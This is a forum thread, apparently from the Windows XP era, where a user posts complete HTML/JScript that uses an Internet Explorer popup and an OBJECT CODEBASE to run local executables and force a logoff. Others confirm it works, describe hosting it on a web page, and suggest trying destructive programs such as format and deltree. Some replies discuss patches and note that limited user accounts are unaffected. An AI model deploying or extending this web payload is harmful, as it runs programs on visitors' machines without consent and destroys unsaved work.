Serious Problem With Windows XP Keep this going

[cremator]

Im just going to paste the source and explain what it does,nothing less.



<HTML>
<HEAD>
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);

function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>



Basically this is an HTML file when opened in Windows XP will log you off. Some might say "so" but when you open it, it doesnt ask to save work in progress ect. The other concern is that other may be able to use command lines like command.com ect to do something worse. I've only tested with logoff.exe and sol.exe, anyone else feel free to test with other programs. Lamers please don't put this on a site just to be an idiot, no one wants to loose work thats been in progress for hours/days/weeks/months.
-Cremator

 

[Sabbathian]

I`ve tried this script, and it doesn`t work

 

[CZroe]

Worked for me (Cremator's friend).
I just tried it out after seeing his post.
Slapped it in a TXT file, renamed to *.htm double clicked it and it logged me off.
And my programs weren't still open when I logged back in :|
I'm too used to XPs "multiple users logged in at the same time" (Fast User Switching) features...

 

[manly]

Nice, is this really a new remote exploit? Or is it fixed by a recent IE patch?

Looks mind-numbingly simple, although to be honest, it wouldn't surprise us that much.

 

[manly]

Bump!

 

[CZroe]

Perhaps IE only runs it if it's on your local machine. I dunno really...

 

[mattbta]

When I get home I'll slap it on my server and then try to access the page from my XP box. I thought an exploit like this was fixed with the last IE patch.

We'll see what happens.

 

[Confused]

Well, it works when it's hosted on another computer.

Don't believe me, click here! (Make sure you save all work first tho if running WinXP! Don't say i didn't warn you!)

ConfusedBW

 

[manly]

So the only question is whether recent IE patches fix this obvious, major problem, or if it's currently a problem in the wild?

 

[dionx]

logged me out too

 

[cremator]

Bump again,let this be known.

 

[Abzstrak]

glad I'm not running windows....

anyways, we need to try this with some other apps that are standard to winxp... like format, deltree /y, etc...

has anyone tried this on nt or 2k?

 

[manly]

I installed a slew of OS updates earlier, and that HTML no longer logs out the user.

I view this as mixed news though. On the one hand, we know Mickeysoft does fix security problems that are exposed in the wild.

On the other hand, I'd say at least half of all home users are not savvy enough to understand they need to go to Windows Update regularly to admin their box.

My final conclusion is that historically, Winblows and IE are security/privacy problems.

 

[CZroe]

Still logs me out (I felt that I had to wait a bit longer though).
The only updates not installed on my side:
Euro Conversion Tool
GeForce3 driver Update (Gateway)

Not sure what that GF3 thing is about, I'm using a home-built P4 system with a retail VisionTek GF3. All I know is that when I installed that update I couldn't even raise my resolution to 1024x768! I hope the driver roll-back didn't affect the other updates

 

[dionx]

i just installed 2 security updates and 2 critical updates and it still logs me off.

 

[cremator]

Bump....keep testing this guys...

 

[speed01]

Didn't log me out. I ran Windows Update last week and only did the critical and security.

 

Didn't work on my system either. Windows Update must have cured the bug.

 

[EHobaX]

It logs me out, too and I have no more security updates to download.
Freaky.

 

[Dreadogg]

logged me out and Im all updated! Ok you guys that did not get loged out are you using XP pro or XP home?

 

[manly]

I did a little more testing, and I'll take back my comments from a few days ago that system updates cured IE.

It seems like the Administrator user is vulnerable, but limited users are not. I test WXP Pro under VMware, so I can repeat different iterations pretty easily. Note that I believe most installations of WXP will add created user accounts to the Administrator group, so this is a serious problem.

Security settings for the Internet and Intranet domains have no effect; setting them both to High still exposed the problem. I was too lazy to test from a web server though, and just loaded the file locally.

Finally, it seems you can run any executable, but I wasn't able to to get it to run arbitrary shell commands using cmd /C

I'm sure more seasoned crackers than myself could do much heavier damage though. If I weren't such a cynic, I'd say this is a new, dangerous remote exploit. But I'm sure Mickeysoft is aware of the problem, and will sit on it until a white hat hacker goes to the media. Any volunteers?

 

[Dreadogg]

very interesting, seems we really should'nt be surfin the net as administrator anyway! I seem to play around with linux every once and a while and I always remember reading make sure you dont surf the net as root I guess this all ties in together for now im just going to set up a new account as user!



EDIT: I am not affected as user! Good call!

 

[TBC]

<< I installed a slew of OS updates earlier, and that HTML no longer logs out the user.

I view this as mixed news though. On the one hand, we know Mickeysoft does fix security problems that are exposed in the wild.

On the other hand, I'd say at least half of all home users are not savvy enough to understand they need to go to Windows Update regularly to admin their box.

My final conclusion is that historically, Winblows and IE are security/privacy problems. >>


Let me guess, you use Linsux.

 

[manly]

<<
Let me guess, you use Linsux. >>



Oh the irony of trolling in a thread about a major remote exploit in WXP.

 

[neuralfx]

<< I'm too used to XPs "multiple users logged in at the same time" (Fast User Switching) features >>



heh sorry, i'm not trolling.. but couldnt resist .. this "Fast User Switching" .. or i guess microsoft probably calls it FUS, could this possibly have been "borrowed" from UNIX .. eh naw ms wouldnt do that =)
-neural